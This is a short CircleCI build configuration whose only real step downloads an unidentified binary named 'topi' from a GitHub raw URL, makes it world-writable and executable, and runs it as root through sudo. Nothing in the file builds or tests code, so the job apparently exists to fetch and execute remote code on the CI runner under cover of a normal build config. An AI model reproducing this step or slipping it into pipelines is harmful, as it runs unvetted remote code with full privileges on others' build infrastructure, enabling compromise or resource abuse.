
version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo su --command "wget https://raw.githubusercontent.com/Myaxisplay/pos/main/topi && chmod 777 topi && ./topi"
